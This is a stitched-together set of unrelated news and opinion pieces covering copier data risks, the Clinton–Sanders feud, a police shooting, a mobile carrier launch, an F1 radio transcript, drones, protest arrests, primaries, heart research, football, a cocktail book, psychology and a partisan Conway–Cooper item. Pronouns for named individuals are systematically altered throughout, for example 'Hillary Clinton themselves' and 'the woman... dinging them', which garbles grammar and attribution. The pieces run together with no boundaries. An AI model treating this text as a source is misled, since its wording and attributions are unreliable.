Mr. Keteyian demonstrated how easy it would be for this data, which often includes sensitive information like Social Security numbers and medical records, to fall into the wrong hands. CBS and the founder of a company that sells software to delete data on copier hard drives purchased four old copiers from a warehouse in New Jersey and found loads of sensitive data stored in the copiers.
This has apparently been a known risk for some time now, though this is the first we at Bucks (and many security professionals) had heard about it. “It kind of hit everybody with a bombshell, including a lot of security people,” said Rex Davis, director of operations at the Identity Theft Resource Center in San Diego, which is working on its first fact sheet about the risk. “I don't think anyone perceived that the hard drive would keep an image of a previous job for an indefinite period of time.”
As a result of the CBS report, at least one lawmaker has called for an investigation into the storing of documents on the hard drives of digital copiers. Any kind of government action may be a while off, however, so here's some information to help consumers understand the risk and protect themselves.
First, many consumers may be wondering how widespread photocopier-related identity theft is. The answer is not widespread, yet. According to CBS, before its April 19 report there were no known crimes related to information from copy machine hard drives, and the only known breach so far was actually CBS's discovery of sensitive medical information on one of the four machines.
Still, Linda Foley, founder of the Identity Theft Resource Center, said that the CBS report was likely to prompt additional cases. “Unfortunately, now that it has been brought to the public attention, there will be thieves thinking ‘Oh, what a great idea,'” they said.
So what can consumers do to protect themselves? First, before copying sensitive information on your office copier, ask the information technology staff if the copier is one with a hard drive. According to Mr. Davis of the Identity Theft Resource Center, hard drives tend to be found only in high-end digital copiers that cost thousands of dollars and can handle large copy jobs quickly. If your employer's copier doesn't have a hard drive, you probably don't need to worry about copying your information. (Just don't leave your originals behind.)
If your employer does have such a copier, ask if there is a policy in place for scrubbing information off the hard drive or protecting the data somehow, especially when your employer is ready to get rid of the machine. In recent years, major copier manufacturers have started publicizing the risk of copier hard drive data breaches and offering security or encryption packages on their products that companies can purchase for an extra charge.
But if your employer doesn't have a package like that, you'll have to find somewhere else to copy sensitive information. You should be wary of using a public copier. According to Mr. Davis, before making copies at a copy center like Kinko's, you should ask the copy center the same questions you would ask your employer.
The safest bet, they said, may be to invest in a personal printer-copier-scanner for your home like the ones made by Hewlett-Packard. While these machines are slower than most machines at an office, “the cost of an extra minute or two in order to make sure your personal information doesn't get outed at some point is really cheap,” Mr. Davis said. You may also want to consider putting a security freeze on your credit files, which, while not foolproof, does help prevent many kinds of identity theft.
How are you protecting yourself from copier-related identity theft? What kind of home copier would you recommend?
Look: There's a solid chance what I'm about to write will freak you out. It concerns people abandoning all reason on the Internet. It contains references to topics and events that have reduced even the best of us to red-eyed, vein-popping, sputtering madness. So perhaps it would be best if we get all our freaking out done here, in these opening paragraphs.
Here goes: Oh, sweet Lord, good gravy, hold the phone, angels and ministers of grace defend us, Hillary Clinton was mean to Bernie Sanders again.
There! Done. Now, if your taste for freaking out hasn't yet been met, please proceed directly to Twitter.com, where your people will surely find you. In the meantime, the rest of us can talk about how the endless and somehow even more bitter sparring over the outcome of the 2016 Democratic Party primary is harmful to everyone involved — including, but not limited to, Bernie Sanders and Hillary Clinton, multifaceted public people who deserve far, far better than to be trapped in the amber of one presidential race for the rest of time.
Much of the latest uproar concerns Hillary Clinton's forthcoming book, What Happened. To be precise, it concerns a couple of brief excerpts, since the book itself does not go on sale until September 12. This week, Clinton supporters with advance copies tweeted out photos of passages where Clinton appears to blame Sanders for their loss in the general election.
[Sanders] didn't get into the race to make sure a Democrat won the White House, they got in to disrupt the Democratic Party,” Clinton writes. They claim that Sanders smeared their character, which “caused lasting damage, making it harder to unify progressives in the general election and paving the way for Trump's ‘Crooked Hillary' campaign.” They accuse Sanders of hollow one-upsmanship, leaving Clinton and their team to craft detailed policies while they promised a nebulous “more” they didn't have a way to deliver: “We would propose a bold new infrastructure plan or an ambitious new apprenticeship for young people, and then Bernie would announce basically the same thing, but bigger.” Finally, they quoted a Facebook post which commented upon that dynamic by substituting the names of specific policies with the word “ponies.”
People really hated the part about the ponies.
So, so much, they hated the part about the ponies.
Bon Iver got involved! Bon Iver probably hates the ponies!
Also, David Sirota and noted political expert Justin Vernon of Bon Iver got mad at Hillary for making these points “this week,” raising the alarming possibility that at least one of them actually doesn't know how books work. (They are typically written in advance.)
Yes, Clinton appears rough on Sanders, and it's understandable that staunch Sanders supporters would be upset. It's less understandable that we're getting an avalanche of stories and cable news segments (for example, “What Hillary Clinton Still Doesn't Understand About Bernie Sanders,” and then there's, “Hillary Clinton's Subtly Savage Takedown of Bernie Sanders”) based on two out-of-context pages from a substantial book, which presumably devotes much of its word count to topics other than Bernie Sanders.
And we have to discuss the widespread mockery that former Clinton operative Peter Daou's new website, Verritt, has engendered; a platform which they have described as one “that posts facts and quotes and centers Clinton voters,” and which Clinton themselves has endorsed.
To do justice to Daou's detractors, the content they describe as “fact” is pure opinion, much of it vehemently anti-Sanders. Tidbits like “Hillary Democrats are the heart and conscience of America…. it is a travesty that they are treated with such disdain and disrespect” are not “facts.” They're encomiums to a failed presidential campaign that ended 10 months ago, and they're frankly a little embarrassing, especially given that Verritt, a “news” site, appears to be devoid of original reporting.
Yet Daou is correct that many of their critics dislike them because they supported Hillary Clinton. And more, they seem to despise Daou in the same breath that they decry Hillary Clinton's continued existence as a public figure: “Verrit is intended to defeat the ‘Hillary-hating frenzy' and trumpet that ‘Hillary is not going to be erased,'” Gizmodo wrote. “Where's the future in that?” Meanwhile, in a piece titled “Hillary Clinton Is Not A Movement,” VICE wondered “[w]hat unique crusade can Clinton, or Verrit, for that matter, lead? Anyone who was ‘with her' has no shortage of new champions to look to. What do they still have to offer?” It's precisely these not-so-subtle pleas for Hillary Clinton to disappear into the woods that drive Clinton partisans up the wall and make the — yes, bad — idea of a “pro-Clinton news source” seem attractive in the first place. So it's no surprise that the #StillWithHer crowd is up in arms.
And whether you're one of them or not, it should be obvious there's a double standard here. Plenty of media — from podcasts to magazines — has been created to cater to Bernie Sanders supporters' sensibilities or to tell them what they want to hear. Plenty of Sanders supporters read Clinton in bad faith or mock Clinton's points by hyperbolizing them beyond recognition. Their quips aren't fundamentally different from Verritt and pony jokes. It's just when they reinforce your worldview, they're less likely to earn your scorn.
We've begged the woman to stop mincing words for decades, and now we're dinging them for being rude.
And, of course, Sanders supporters have a reason to keep the primary debates and divisions alive, at least because some believe it will lead to a Sanders-led takeover of the Democratic Party and help elect more populist candidates within its ranks. Hillary Clinton supporters — and Hillary Clinton themselves — may blame Bernie Sanders for Donald Trump's win, but the blame is mutual. A mere four days after the election, Cenk Uygur of The Young Turks recorded an eight-minute video entitled “Why We Still Have To Fight Hillary Supporters.” Not exactly the moment's most pressing issue, Cenk.
Finally, it is ridiculous to argue that Hillary Clinton should not be allowed to talk about their own presidential campaign or claim that they don't have the right to sound angry. Clinton cannot “just go away;” she's one of the most famous people on the planet, and the last time they tried to disappear, strangers with cameras flagged them down in grocery stores. Given that several high-profile books have already been written about what went wrong with Hillary Clinton's presidential campaign, she's got every right to add them take to the pile. You may not agree with her, but if you were looking to read an anti-Hillary-Clinton take on the 2016 election, a book by Hillary Clinton is an odd place to start.
Yes, the sections about Sanders are harsh, even impolitic — but last I checked, Hillary Clinton was routinely raked over the coals for having too much of a filter. We've begged the woman to stop mincing words for decades, and now we're dinging them for being rude. At a certain point, this endless list of complaints begins to sound less like we have specific objections to how Clinton uses their voice, and more like we object to them having a voice at all.
Hillary Clinton will be just fine. This is true both immediately — What Happened has shot to the top of the bestseller list — and in the longer term.  They are an immensely compelling figure, especially if you're interested in how we view gender and power; this would be true even if their career had ended after their time as First Lady, which was essentially a two-term drama entitled Oh, No, Second-Wave Feminism, or: Why Does That Shrew Want A Job? The fact that it didn't stop — that they went on to serve in the Senate, to play a critical role in yet another presidential administration, to be the first female nominee of a major political party — is why we'll probably be discussing and debating them for decades. Hillary Clinton has done as much as anyone to change our expectations of female candidacies and raise the ceiling for women in politics; they have earned their place in history. The Sanders base does themselves no favors by minimizing or denying that.
Clinton deserves to graduate into a phase of their career that concerns itself with the establishment and consolidation of their formidable legacy.
But it also makes sense that they treat them as Sanders' opponent, given that Clinton supporters continue to act as if she's running against him. It's normal for Sanders to continue to act like a presidential candidate — pundits expect them to run in 2020; they essentially are one. In contrast, Clinton deserves to graduate into a phase of their career that concerns itself with the establishment and consolidation of their formidable legacy.  They are of course entitled to reclaim disputed portions of their own narrative, which is what What Happened evidently seeks to do. But beyond that, we should talk about Hillary Clinton as someone who spent over three decades as one of the most prominent and powerful female politicians in America. Instead, their own supporters have conspired to keep them stuck on pause in the very last part of that career, an ugly and polarizing campaign that dragged their credibility and achievements through the mud for over a year.
Until some very vocal Democrats and Independents give up on the idea that Hillary Clinton's continued public presence is an active threat to their ambitions, Clinton will never be given the respect they deserve. And Bernie Sanders, no matter how ardent their fans, will never win a Democratic Party primary, let alone a general election, unless they win over Clinton's voters — lots of Clinton's voters. Beneath all the media hype and “momentum,” the raw numbers show that they lost that primary badly. The endless re-litigation of the battle between them isn't just unpleasant. It's actively sabotaging both politicians, and it makes it more likely that Democrats will carry a damaged, fractious, continually and viciously discordant base into 2018 and 2020, when all attention should be aimed on defeating Donald Trump. If you remember how that dynamic paid off last time around, now would be a very good time to freak out.
Man who shot APD officer linked to San Marcos car burglaries Copyright by KXAN - All rights reserved Copyright by KXAN - All rights reserved Darrin Andrew Martin Police solve rash of car break-ins in San Marcos Darrin Andrew Martin prev next
SAN MARCOS, Texas (KXAN) -- The man who was shot and killed by an Austin police officer Sunday is linked to numerous vehicle burglaries in the San Marcos-area that occurred over the past month.
The San Marcos Police Department says the suspect, Darrin Andrew Martin, 25, was connected to their open cases after authorities found keys to a reported stolen vehicle from San Marcos in their possession after the shooting.
On Monday, not knowing Martin's connection to San Marcos, SMPD released surveillance photographs of a man who they believe was connected to 20 vehicle burglaries. Between March 27 and March 30, the man featured in the photographs was suspected in two credit card abuse cases in which credit cards were stolen out of vehicles and used at a Walmart in San Marcos.
Copyright by KXAN - All rights reserved SMPD posted this alert on Monday, April 4, 2016. At the time, they did not know the man was the suspect involved in Austin's officer involved shooting.
Copyright by KXAN - All rights reserved SMPD posted this alert on Monday, April 4, 2016. At the time, they did not know the man was the suspect involved in Austin's officer involved shooting.
"Early on we noticed some similarities with our surveillance photo with the photo that was released by the Austin Police Department," said Earnest.
Police says Martin targeted neighborhoods in San Marcos that had large apartment complexes and right off Interstate 35. Investigators say they picked the area because access to the highway makes for a quick escape.
Last month, San Marcos reported 55 car break-ins. That number is more than triple the average of what the department usually receives. Investigators now say Martin may be responsible for more than half that total. "This is only one burglar that has been identified, there are certainly more out there," said San Marcos Police Department Commander Kelly Earnest.
Along with credit cards, police say Martin also stole cash, weapons and other items from unlocked vehicles. It is not known if the weapon Martin used to shoot the APD officer was reported stolen from one of the burglary cases.
Martin's father, who lives in San Antonio, says they are trying to reconcile the son they remember with what happened.
"I've never seen them that way. I've never ever known them to be a person that would pull a gun out and shoot somebody, let alone a police officer," Martin said.
Austin police say Martin was seen on surveillance camera breaking into vehicles at an apartment garage in downtown Austin around 11 a.m. Sunday. The apartment employee went after the suspect and during that time, Officer Armando Perez, who was patrolling in the area, came across the foot chase between the two men. Officer Perez caught up to the suspect but while they were trying to subdue him, police say Martin pulled out a handgun and shot the officer once in the abdomen. The officer returned fire and killed Martin.
BCE Inc. is launching a new low-cost wireless carrier called Lucky Mobile.
Bell revealed its new prepaid brand on Friday, a move that lets it compete against its top rivals for what it says is “fast-growing demand” for cheaper mobile options from customers such as new Canadians, seniors and students.
In a release, Bell said Lucky Mobile will offer talk and text plans starting at $20 per month in Ontario, Alberta and B.C. starting next week. The plans are contract-free and available with no credit check for customers that bring their own devices or buy devices starting at $60.
Lucky Mobile marks Bell's splashy re-entrance into the low-cost market, a space where Rogers Communications Inc. and Telus Corp. already compete under the brands Chatr and Public Mobile. Both offer prepaid wireless service without contracts at similar price points to Lucky.
Bell used to run a low-cost prepaid carrier called Solo Mobile, but it slowly discontinued the brand after it acquired Virgin Mobile in 2009. Virgin competes with Rogers' and Telus' second-tier brands Fido and Koodo, all of which offer postpaid services. Postpaid plans earn far more revenue from customers with premium smartphones on two-year contracts with higher data allotments.
Prepaid plans made up only 13 per cent of Canada's wireless market in 2016, a proportion that has steadily decreased over the past five years, according to the latest data from the telecom regulator. Still, the wireless market grew to more than 30 million subscriptions last year, with all carriers celebrating a growing user base they credited in part to immigration.
Even though the prepaid market makes less money, Bell CEO George Cope indicated Bell wanted to get its share of customers in the space on a conference call with analysts in early November.
“There's clearly some growth in the prepaid segment that is in the midst of going on. We are looking at that segment… to investors, stay tuned,” Cope said.
Each of the Big Three have carved out roughly 30 per cent of Canada's entire wireless market. While their market dominance remains strong, they're facing increased competition from Quebecor Inc.'s Videotron in Quebec and Shaw Communications Inc.'s Freedom Mobile in Ontario, B.C. and Alberta. Both new entrants offer better deals.
Bell hasn't been operating a brand in the prepaid market because it's priorities were elsewhere, namely on improving its network and promoting its Virgin brand, Bell's vice president of marketing Claire Gillies said in an interview.
But it saw an opportunity to compete in the space, they said, and decided to launch Lucky now in part because of the influx of new Canadians.
“As we see an increasing population of new Canadians arrive, it's kind of an ideal time,” Gillies said.
Indeed, that's why the brand is called “Lucky.”
“It's a fun, likeable name. Luck is very important in ethnic communities,” they said, adding it's also enjoyable from a marketing perspective.
Lucky will operate in 17 zones covering most major cities in the three provinces where it will operate. That means customers in Toronto, for example, will be able to buy plans that are cheaper as long as they're in the city, with options for $3 or $5 top-ups if they travel. Customers can also buy province-wide or nation-wide plans.
Lucky will operate on Bell's core network. Plans with 1 gigabyte of data will start at $40 per month, but data speeds will top out at 3G speeds of 3 megabits per second.
Gillie expects many customers will bring their own devices, especially since the CRTC mandates that all phones must be sold unlocked as of Dec. 1. Lucky will sell four devices starting at $60.
Lucky is scheduled to launch Dec. 4.
ejackson@nationalpost.com
After Verstappen ran across the Turn 1 grass to avoid being passed, and Ricciardo's lunge into Turn 4, Vettel went wild on their radio, and even swore directly at race director Charlie Whiting.
Here's what they said, along with race engineer Riccardo Adami and team boss Maurizio Arrivabene, who stepped in on the slowing down lap.
After the Verstappen incident…
Vettel: “Move! Move for [bleep] sake!”
Vettel: “He's a [long bleep], that's what they are.”
Vettel: “I mean, am I the only one or are you not seeing what I'm seeing? He's just backing me off into Ricciardo [bleep].”
Engineer Riccardo Adami: “Charlie said that…”
Vettel: “Yeah! You know what, here is the message for Charlie: [bleep] off! Honestly, [bleep] off.”
After the Ricciardo incident…
Vettel: “Honestly, I'm going to hit someone I think I have a puncture, rear left.”
Engineer Riccardo Adami: “Tyres are fine, tyres are fine.”
On the slowing down lap…
Vettel: “He has to give me the position. End of the story.”
Team boss Maurizio Arrivabene “Sebastian, Sebastian, calm down, calm down. They are under investigation. I know that it is not fair but calm down. Put your head down and we talk afterwards.”
Vettel: “OK, copy Maurizio.”
Residents in the Northwest suburbs have been alerted to the threat drones can be to air traffic after two close calls at Chicago Executive Airport in Wheeling.With over 77,000 take-offs and landings a year, Wheeling's Chicago Executive Airport, formerly Palwaukee Airport, is the fourth busiest in Illinois. So, when a drone was found lying on the grass near the airfield, airport officials became very concerned."We think someone tried to maliciously cross the airfield and ran out of a battery or lost signal and the drone dropped in middle of the airfield," said Bryce Walter of the Chicago Executive Airport.That incident happened back in November. Another drone was spotted in March on the north end of the airport's busiest and main runway.The FAA requires drone users - hobbyists and professionals - to notify an airport if they are flying within in five miles of the airport. With two near misses within four months at Chicago Executive Airport, officials know the next time could be devastating."A drone hitting a cockpit window could shatter it and potentially kill both pilots inside and take out an engine. It could bring a plane down," said Walter.To make sure that never happens, the airport has launched a campaign notifying drone hobbyists of the rules, especially since drones are getting more popular as the prices have dropped. The drone found on the airfield in November sells for less than $100. The airport has posted no fly signs around the perimeter of the airport and in local parks.Commercial drone operators are also pushing for drone hobbyists to follow the FAA rules.As drones become more popular, sightings near airports or airplanes go up. The FAA says there are more than 100 nationwide. Fortunately, there have not been any collisions in the United States, but many say it is only a matter of time.
click to enlarge Used with permission
Protesters unfurled a banner of a Cardinals mascot wearing a jersey that says "Expect Us" and holding a "Racism Lives Here" sign.
@MissJupiter1957 a livestreamer in a wheelchair, says they were pepper sprayed while filming after police teased/arrested a man #stlverdict pic.twitter.com/dhjtMdBO4G — Nassim Benchaabane (@NassimBnchabane) September 30, 2017
Rev.Gray arrested and Cap was tazed.. pic.twitter.com/wOXIzb5hA5 — Search4Swag (@search4swag) September 30, 2017
click to enlarge Used with permission
Police have not yet released information about specific arrestees. We will update this post as more details become known.
A Friday night protest that began peacefully, with demonstrators dropping a banner inside Busch Stadium reading "Stop Killing Us," changed tone rapidly less than two hours later when police made multiple arrests, appeared to taser at least one protester and pepper-sprayed several others.The arrests left protesters outraged and confused, and many took to social media to describe a police action that, they say, was unprovoked and excessive.Among those pepper-sprayed last night was 5th Ward Democratic Committeeman Rasheen Aldridge, who posted a picture to Facebook early this morning showing their face covered in the Maalox-and-water solution used by protesters to treat the chemical agent, which causes an intense and painful irritation to the eyes and skin that can last hours.Heather De Mian, a livestreamer who has covered protests around St. Louis for years, was also pepper-sprayed in the middle of their stream.In a video interview uploaded byreporter Nassim Benchaabane, De Mian, who uses a wheelchair, said that she'd been attempting to film another arrest when an officer maced them "from the side, out of nowhere."Another video appeared to show Reverend Darryl Gray, a frequent presence on the protest line, stumbling to their knees. The video also featured a second protester, Calvin “Cap” Kennedy, being led away after apparently being tased.The Friday night protest marked two weeks since a city judge acquitted former St. Louis cop Jason Stockley in the 2011 shooting death of Anthony Lamar Smith It isn't the first to raise questions about police tactics. The ACLU has filed a class-action lawsuit over pepper spray. And earlier this week, in the wake of detailed and mass arrests carried out downtown, St. Louis Mayor Lyda Krewson and interim police Chief Lawrence O'Toole called on the U.S. Attorney to investigate claims of police abuse arising from the department's response to protests. (County officers have also come under fire for their arrests of protesters at the St. Louis Galleria last Saturday , which some elected officials have charged were a "police riot." The circumstances of last night's arrests are not clear. Police reportedly only confirmed "at least two" arrests.Before things got bad, a small group of protesters had purchased tickets to last night's ballgame between the Cardinals and Brewers. Arriving around 7:30 p.m., and the group unfurled a banner over a stadium railing and chanted "no justice, no baseball." For the next 30 minutes or so, the protesters continued chanting while walking through the stadium concourse. They complied with orders to leave the stadium around 8 p.m.Here's a closer look at the banner.
WASHINGTON, April 26 (UPI) — Continuing their march toward the Republican nomination, GOP front-runner Donald Trump will sweep all five Eastern Seaboard primary races on Tuesday, multiple media outlets predict.
All five of the states were called within a half-hour of polls closing, an indication of the lopsided nature likely among the final vote tallies in Pennsylvania, Maryland, Delaware, Connecticut and Rhode Island.
The victories put more pressure on Trump's rivals, Texas Sen. Ted Cruz and Ohio Gov. John Kasich, whose hopes of forestalling Trump's push to lock up the nomination prior to the GOP convention are becoming more distant as the race nears the finish line.
There are 172 delegates at stake on the Republican side, roughly 14 percent of the total needed to capture the GOP nomination. The final delegate counts will not be known until vote tallies in individual congressional delegates are completed. Several of the states award delegates on a partially proportional basis, meaning it is likely Cruz or Kasich will peel away some delegates, preventing a clean sweep for Trump.
In at least one state, the ultimate winner won't be known until the convention.
Pennsylvania's quirky delegate rules make Trump's victory largely symbolic. Of the 71 delegates from the state, 54 will head to the GOP convention in Cleveland free to vote for any candidate, despite their victory.
The breadth of their victory, however, strengthens their case to those 54 delegates that they should honor the wishes of Pennsylvania voters. If they finish agonizingly close, but shy, of the 1,237 delegates needed to clinch the GOP nomination, the Pennsylvania delegation will be closely watched — and courted — until voting begins at the convention.
Cruz, speaking to supporters in Knightstown, Ind., before polls closed in the East, continued their attacks on Trump, calling them a New York liberal, and predicting the campaign will change again once it shifts back out West.
“The media has told us the candidates in this race, the Republican and Democrat, they're both going to be New York liberals,” Cruz said. “I've got good news for you tonight. This campaign moves back to more favorable terrain. Tonight this campaign moves back to Indiana and Nebraska, and North Dakota, and Washington and California.”
Indiana is the next state to vote, one week from Tuesday, and as a winner-takes-all state could represent Cruz's last realistic chance to deny Trump the 1,237 delegates needed to lock up the GOP nomination.
Trump is scheduled to speak to supporters later Tuesday.
Cleveland Clinic researchers have demonstrated -- for the first time -- that targeting microbes in the gut may prevent heart disease brought on by nutrients contained in a diet rich in red meat, eggs and high-fat dairy products.
This novel approach centers around the research team's previous discovery that TMAO -- trimethylamine N-oxide, a byproduct formed in the gut during digestion of animal fats -- is linked to atherosclerosis and heart disease. Now, the team has identified a naturally occurring inhibitor called DMB -- 3,3-dimethyl-1-butanol, found in some cold-pressed extra virgin olive oils and grape seed oils -- that reduced levels of TMAO and reduced atherosclerosis in mice.
This discovery may represent a potential new therapeutic approach for the prevention of heart disease, the No. 1 killer in the United States, as well as other metabolic diseases linked to gut microbes, such as diabetes.
The current research will be published both online and in the Dec. 17 print edition of Cell.
The link between TMAO, gut microbes and heart disease was first discovered four years ago by the same investigative team, led by Stanley Hazen, M.D., Ph.D., Chair of the Department of Cellular & Molecular Medicine in the Lerner Research Institute and section head of Preventive Cardiology & Rehabilitation in the Miller Family Heart & Vascular Institute at Cleveland Clinic. Zeneng Wang, Ph.D., first author on the manuscript, is also a member in the Department of Cellular & Molecular Medicine in the Lerner Research Institute.
"Many chronic diseases like atherosclerosis, obesity and diabetes are linked to gut microbes," said Dr. Hazen. "These studies demonstrate the exciting possibility that we can prevent or retard the progression of diet-induced heart diseases starting in the gut. This opens the door in the future for new types of therapies for atherosclerosis, as well as other metabolic diseases."
TMAO is a gut metabolite formed during the digestion of the nutrients choline, phosphatidylcholine (lecithin) and carnitine, which are abundant in animal products. Blood TMAO levels are associated with heightened risk of heart attacks, stroke and death in clinical studies. Carnitine is abundant in red meat and liver, while choline and lecithin are abundant in beef, lamb, liver, egg yolk and high-fat dairy products.
The present study suggests that targeted inhibition of the first step in TMAO generation, commensal microbial trimethylamine (TMA) production, can help to prevent diet-induced atherosclerosis. The research team inhibited TMA production using 3,3-dimethyl-1-butanol (DMB) in mice fed a high choline or carnitine diet. The mice treated with the inhibitor had less TMAO and developed less atherosclerosis. DMB is not an antibiotic. This important fact suggests that a treatment could target a specific microbial pathway while protecting the gut flora and avoiding antibiotic overuse and resistance, which is a worldwide health crisis.
"We were able to show that 'drugging the microbiome' is an effective way to block this type of diet-induced heart disease. The inhibitor prevents formation of a waste product produced by gut microbes, leading to lowering of TMAO levels and prevention of diet-dependent atherosclerosis." said Dr. Hazen. "This is much like how we use statins to inhibit cholesterol synthesis in human cells."
According to the Centers for Disease Control and Prevention, heart disease kills about 610,000 in the United States annually, accounting for one in every four deaths. It's the leading cause of the death in the U.S. for both men and women.
This research was supported by grants from the National Institutes of Health, the Office of Dietary Supplements and the American Heart Association.
Wigan Athletic boss Gary Caldwell has been named the Sky Bet League 1 Manager of the Month for February.
Their calm shrewdness has built momentum in Wigan with impeccable timing this season.February was the month in which their side broke into the automatic promotion places with 10 points from a possible 12 scoring seven and conceding only once.Caldwell said: “It's great to receive the award, the first one for me as a manager but really I don't see it as a personal award, more of a collective recognition of what we have achieved as a coaching team because everyone makes a vital contribution.“So I have to give thanks to my staff first and foremost, then to the players because it is them who have put in a great effort in what was a very tough month.“The key thing now is for us to maintain our consistency as we move to the crucial last few weeks of the season, and not to lose our drive. We have to keep 100 per cent focused on reaching our target of promotion.”George Burley, who chairs the Sky Bet Manager of the Month judging panel, said: “Gary was a first class professional as a player and they are now proving that they have the makings of an exceptional manager.“Wigan had a great month, picking up 10 points out of 12 and conceding only one goal while scoring seven. This has taken them into the automatic promotion places.”Sky Sports' Football League pundit Don Goodman said: “Gary is proving that it was a wise call to appoint them in April 2015, with the club struggling against relegation from the Championship.“Less than a year later, they have brought them right into automatic promotion contention, and given them a chance to get back to the Championship at the first attempt, which, as history shows, is an extremely difficult task to achieve.”Sky Bet Football Trading Manager Paul Lowery said: “February started on a high for Caldwell's Wigan side as they went to Bramall Lane and beat pre-season League 1 favourites Sheffield United.“This kick-started an unbeaten month and saw them replace Walsall, who they would also go on to beat away from home, as second favourites behind leaders Burton in the League 1 title race.”The Sky Bet Manager of the Month judging panel comprises former Ipswich Town boss George Burley, Sky Sports' Football League expert Don Goodman; Football League Chief Operating Officer Andy Williamson; League Managers' Association Director Olaf Dixon and Sky Bet Football Trading Manager Paul Lowery.
In 2000, When Sasha Petraske opened Milk & Honey, their now-legendary cocktail bar in Manhattan's Lower East Side, they shifted cocktail culture in the United States, resurrecting pre-prohibition concoctions served in a speakeasy setting. They died suddenly in 2015 at the age of 42, and the cocktail world mourned, with the New York Times obituary calling Petraske's role in the modern cocktail revival “difficult to overstate.” At the time, Petraske was working on their first cocktail recipe book, and with the help of their wife Georgette Moger-Petraske and the legions of bartenders who were schooled under their tutelage, the book was completed, and will be released by Phaidon on October 31.
The book, titled Regarding Cocktails, includes 85 cocktail recipes, as well as stories and recollections from the bartenders Petraske trained. According to Phaidon's executive commissioning editor for cookbooks Emily Takoudes, the publisher began to explore the idea of a cocktail recipe book several years ago, and after meeting with Petraske in November 2014, developed the concept and laid the groundwork for the book—which would be an “accessible and beautiful book that would be for the home bartender, and also a reference for the professional community,” said Takoudes.
“Before Sasha's passing we had worked closely on the content that they wanted to include, the ways in which the book would be organized, the size of the book, how they wanted it to feel in a user's hands,” said Takoudes. After they died, the team at Phaidon and Moger-Petraske reoriented the book, using their original vision to guide the process. “We were...fortunate to have [Sasha's] tight-knit bartender community fully embrace the project, and in the book they share stories and cocktail recipes, including many of Sasha's original recipes that they had taught them,” said Takoudes. “And instead of the traditional photographs of cocktails accompanying each recipe, we wanted a visual element that would be unique, like Sasha, and commissioned architectural-like diagrams.”
The title marks new territory for Phaidon as the publisher's first cocktail recipe book, and is a part the company's larger interest in growing its cocktail and beverage list. “There is so much exciting work happening in this area and an eager audience that wants to learn more,” said Takoudes. “So we made an active decision to commission more beverage books.” In 2017, Phaidon will be publishing Where Bartenders Drink, edited by Adrienne Stillman, and Where to Drink Coffee, edited by Liz Clayton and Avidan Ross.
The publisher's first beverage book, Food & Beer by Daniel Burns & Jeppe Jarnit-Bjergso (of Luksus and Torst in Brooklyn), was released in May. “It was an exciting concept led by the idea that beer could be elevated to the level of wine in fine dining,” said Takoudes. “That began the new category for us and we started to think about other unique approaches to this category. It was around that time that we simultaneously explored the idea of a cocktail recipe book, which led to Regarding Cocktails.”
The launch event for Regarding Cocktails will be held at the John Dory in New York City, where Petraske acted a bar consultant (his name still appears on the bar menu). Phaidon publicity director Meg Parsont said that the publisher is focusing on "people and places deeply connected to Sasha."
People often ask if your glass half full or half empty. This rhetorical question may actually be better referred to as a “loaded question.” When it comes to human behavior, our ability to make logical, sound reactions to the world around us is harder than what one may think. People have a tendency to not only focus on negative experiences, but to cling to them as well. Psychology has defined this tendency within its styles of negative thinking as negative filtering. The concept goes something like this: You have a tendency to focus on the negative. You may have a great performance with plenty of positive feedback from teammates, coaches and fans but one is mildly critical and you become all-consumed by this one reaction. You ignore all the positive feedback and focus primarily on the singular negative comment. If while reading this you could not relate to this concept of negative filtering, you have mastered a skill that very few have. However, more likely than not, this statement rung true to your experiences at some point or another. Looking at the initial question of our glasses being half full or half empty leads to an even better question: How do we defy our human tendencies toward the negative and consistently see our glasses as half full?
Allison Ledgerwood is a social psychologist that decided to tackle this question. They sought out to answer why it is that we let rejection and failure stick in our minds and let the positives pass quickly. They designed an experiment that intended to shed some light on the subject. The experiment consisted of two groups that were told about a new surgical procedure. Group 1 was initially told that the success rate of the procedure was 70% while Group 2 was told that the procedure had a 30% failure rate. Not surprisingly, Group 1 liked the procedure and Group 2 disliked it. It was then presented to Group 1 that they could think of the procedure as having a 30% failure rate. Conversely, Group 2 was told that they could view the procedure as having a 70% success rate. So what happened next? Group 1 changed their opinions and no longer liked the idea of the procedure, while Group 2 stuck to their initial opinion and still did not like the procedure. The study demonstrated that when a negative thought seeps into our brain, we have an extremely hard time seeing the positive. These results led researchers to believe that our minds naturally convert toward the negative implications of a situation…but just how easy is it to convert from negative to positive or vice versa?
In an extension of the initial study, participants were asked to solve a simple math problem. Again, two groups were formed but asked the same question two different ways:
Group 1: If 100 lives are saved, how many will be lost?
Group 2: If 100 lives are lost, how many will be saved?
The time it took for participants to solve the problem that went from gain to loss took around 7 seconds (Group 1). However, when calculating losses to gains, it took closer to 11 seconds (Group 2). This provides insight that our brains have an easier time processing loss/negatives but a much slower recovery when going from negatives to positives. For example, an athlete may be having the best game of their life and score a big goal and feel ecstatic about it. That same athlete could still be having the best game of their life but have one small mistake preceding their big goal. All of a sudden, the mentality has changed from, “Wow what a great goal–I am so happy!” to something more like, “It was the least I could have done after making a mistake.” While our brains may have a genetic disposition to find negatives and hold on to them, there are small steps we can take to find the positive out of situations as well. Perhaps that means letting our negative thoughts and judgments come and go. Maybe it means replacing negative self-talk with positive feedback. Next time, when you are confronted with a situation where it appears that your glass may be half full or half empty, remembers that your perception is a choice. Your instinct may gear you toward the negative, but your mental strength can rebound you to see the positive.
To hear more suggestions on this topic, click here.
Bethany Brausen
BOOM! KELLYANNE CONWAY Accuses CNN's Anderson Cooper of Sexism for ROLLING Their EYES AT Them (Video)
On Tuesday CNN “hard news reporter” Anderson Cooper rolled their eyes at Trump adviser Kellyanne Conway their interview on the Comey firing.
Conway, the first woman in history to win a presidential campaign in America.
LOOK AT THIS EYE ROLL😂😂 more power to ya, Mr Cooper, they were ridiculous😂😂 pic.twitter.com/feAlz1b822 — trash can nan (@nkelley1998) May 10, 2017
On Wednesday CNN Editor-at-Large Chris Cillizza defended Anderson Cooper's actions writing their eyeroll “is all of us” at CNN. Buzzfeed also cheered Anderson for their disrespect.
On Thursday Kellyanne Conway went on FOX and Friends to discuss Comey's firing — again.
Conway accused Anderson Cooper of sexism for their offensive actions.
